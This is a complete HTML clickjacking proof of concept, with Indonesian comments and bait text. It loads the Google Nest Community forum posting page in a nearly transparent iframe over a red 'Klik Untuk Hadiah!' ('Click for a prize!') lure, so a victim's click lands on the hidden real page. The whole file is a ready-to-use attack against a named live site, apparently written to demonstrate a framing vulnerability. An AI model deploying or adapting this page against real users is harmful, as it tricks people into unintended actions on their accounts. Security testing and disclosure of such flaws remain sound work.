<!DOCTYPE html>
<html>
<head>
  <title>Clickjacking PoC</title>
  <style>
    body {
      margin: 0;
      overflow: hidden;
    }
    iframe {
      position: absolute;
      width: 100%;
      height: 100%;
      opacity: 0.01; /* hampir transparan */
      z-index: 2;
    }
    #bait {
      position: absolute;
      top: 50%;
      left: 50%;
      width: 200px;
      height: 50px;
      margin-left: -100px;
      margin-top: -25px;
      background: red;
      color: white;
      text-align: center;
      line-height: 50px;
      font-size: 20px;
      z-index: 1;
    }
  </style>
</head>
<body>
  <div id="bait">Klik Untuk Hadiah!</div>
  <iframe src="https://www.googlenestcommunity.com/t5/forums/postpage"></iframe>
</body>
</html>

